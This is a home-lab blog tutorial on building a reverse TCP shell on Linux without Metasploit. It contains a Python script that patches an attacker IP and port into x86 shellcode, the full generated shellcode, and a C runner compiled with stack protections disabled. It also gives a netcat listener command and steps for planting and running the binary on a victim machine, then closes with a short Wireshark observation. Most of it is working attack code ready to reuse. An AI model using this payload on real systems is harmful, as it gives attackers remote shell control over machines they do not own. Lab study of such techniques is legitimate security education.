1. Purpose.
What is Reverse shell/Reverse TCP?
A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved. Its purpose is to hijack cmd on Windows or Terminal on Linux.
In this post, we will get shell of a server machine or a machine contains web server by using Reverse TCP from an attacker’s machine. Shellcode will be written line by line, not using available frameworks like Metasploit, etc.
2. Preparation and tools.
2.1. Use VMWare Workstation 15 Pro to run 2 OS:
– Kali Linux 20.3 (attacker): IP 192.168.5.129
– Kali Linux 19.4 (server/victim): IP 192.168.5.136
*Make sure that the two machines can ping each other successfully over the ICMP protocol.
2.2. Create a Python language script as below to get the right shellcode of attacker’s IP and port to put into C language script then:
import socket
import sys
import struct
code = ""
code += "\\x89\\xe5\\x31\\xc0\\x31\\xc9\\x31\\xd2"
code += "\\x50\\x50\\xb8\\xff\\xff\\xff\\xff\\xbb"
code += "\\x80\\xff\\xff\\xfe\\x31\\xc3\\x53\\x66"
code += "\\x68\\x11\\x5c\\x66\\x6a\\x02\\x31\\xc0"
code += "\\x31\\xdb\\x66\\xb8\\x67\\x01\\xb3\\x02"
code += "\\xb1\\x01\\xcd\\x80\\x89\\xc3\\x66\\xb8"
code += "\\x6a\\x01\\x89\\xe1\\x89\\xea\\x29\\xe2"
code += "\\xcd\\x80\\x31\\xc9\\xb1\\x03\\x31\\xc0"
code += "\\xb0\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf6"
code += "\\x31\\xc0\\x31\\xd2\\x50\\x68\\x2f\\x2f"
code += "\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89"
code += "\\xe3\\xb0\\x0b\\xcd\\x80"
if len(sys.argv) < 3:
print 'Usage: python {name} [ip] [port]'.format(name = sys.argv[0])
exit(1)
ip = socket.inet_aton(sys.argv[1])
# Find valid XOR byte
xor_byte = 0
for i in range(1, 256):
matched_a_byte = False
for octet in ip:
if i == int(octet.encode('hex'), 16):
matched_a_byte = True
break
if not matched_a_byte:
xor_byte = i
break
if xor_byte == 0:
print 'Failed to find a valid XOR byte'
exit(1)
# Inject the XOR bytes
code = code.replace("\\xb8\\xff\\xff\\xff\\xff", "\\xb8\\x{x}\\x{x}\\x{x}\\x{x}".format(x = struct.pack('B', xor_byte).encode('hex')))
# Inject the IP address
ip_bytes = []
for i in range(0, 4):
ip_bytes.append(struct.pack('B', int(ip[i].encode('hex'), 16) ^ xor_byte).encode('hex'))
code = code.replace("\\xbb\\x80\\xff\\xff\\xfe", "\\xbb\\x{b1}\\x{b2}\\x{b3}\\x{b4}".format(
b1 = ip_bytes[0],
b2 = ip_bytes[1],
b3 = ip_bytes[2],
b4 = ip_bytes[3]
))
# Inject the port number
port = hex(socket.htons(int(sys.argv[2])))
code = code.replace("\\x66\\x68\\x11\\x5c", "\\x66\\x68\\x{b1}\\x{b2}".format(
b1 = port[4:6],
b2 = port[2:4]
))
print code
2.3. Prepare a C language script to create an executable file which will be insert into the victim.
#include <stdio.h>
#include <string.h>
int main(void){
unsigned char code[] = "here you must input the shellcode got after running the python script above";
printf("Shellcode length: %d\n", strlen(code));
void (*s)() = (void *)code;
s();
return 0;
}
3. Start.
Calling the attacker’s machine is attacker for short, and the victim’s is victim.
Remember that we will test 2 times: the first is with inet_addr 127.1.1.1 (localhost), the last is with 192.168.5.129 to compare two results.
Follow the steps below:
— Step 1: On attacker, create a file named create.py in Desktop folder by
touch create.py
— Step 2: Use command nano create.py or any other text editor to open create.py file. Copy the Python script and paste into create.py.
Then press Ctrl+O+Enter to save file, Ctrl+X to exit file and return to terminal.
— Step 3: Use command python create.py 192.168.5.129 5555 to get the shellcode of attacker’s IP and port.
Note that IP 192.168.5.129 and port 5555 is of attacker. This IP and port will be used by a new file created in step 5 to send signals back to attacker via IP 192.168.5.129 and port 5555 if that new file is successfully inserted into the victim.
Below is shellcode:
\x89\xe5\x31\xc0\x31\xc9\x31\xd2\x50\x50\xb8\x01\x01\x01\x01\xbb\xc1\xa9\x04\x80\x31\xc3\x53\x66\x68\x15\xb3\x66\x6a\x02\x31\xc0\x31\xdb\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\x66\xb8\x6a\x01\x89\xe1\x89\xea\x29\xe2\xcd\x80\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\x49\xcd\x80\x41\xe2\xf6\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80— Step 4: Create a C language script file named getshell.c and paste the C script together with the shellcode got in step 3 into getshell.c file.
Make sure that the code[] array just contains the shellcode got from Python, does not contain any space or other characters.
Ctrl+O+Enter to save file, Ctrl+X to exit file and return to terminal.
— Step 5: Compile getshell.c file on 32-bit platform by using gcc compilergcc -fno-stack-protector -m32 -z execstack getshell.c -o getshell
The getshell executable file was created (file with serrated icon) as in picture 7.
In this step, if you cannot compile the file because of error “fatal error: bits/libc-header-start.h: No such file or directory”, you can follow this page to solve it.
— Step 6: Find a way to send the executable file to victim. There are many advanced technical methods for doing that, but in this blog I only use the basic way is “copy and paste”. Let’s copy output file in step 5 and paste it into any File Manager folder on victim.
— Step 7: On attacker, use NetCat tool to be ready for listening on victim. Waiting for the responses from victim.nc -vlp 5555
— Step 8: On victim, run the getshell exec file by 1 of 2 commands below:./getshell
or'/var/run/vmblock-fuse/blockdir/61IYqB/getshell'
— Step 9: Back to attacker screen, seeing that the attacker successfully got the shell of Terminal. Under the connect to… line, all commands will run under victim’s Terminal.
— Step 10: On attacker’s current terminal, let’s try some basic commands of victim’s Terminal.
*Now, imagine that there is a third people, he wants to know what happens between 2 these machine, he will use Wireshark tool on his machine to follow for getting some info between 2 these machines.
To practice like that, first, we open Wireshark on a third computer and choose the card which 2 these machines using, and all 3 machines must ping to each other okay.
Then we create some files in Desktop folder of victim.
Check if attacker can see those new files…
Open Wireshark on 3rd computer, check if there is any related packet was caught.
We can see Wireshark caught many packets transferred between 192.168.5.129 and 192.168.5.136, and the packet has the content like in picture 13.
Follow the packet with TCP Stream for full details of this packet.
It’s okay. Next actions is up to you.
Thanks for visiting my blog! Hope you will return next time…
ITLabLogs 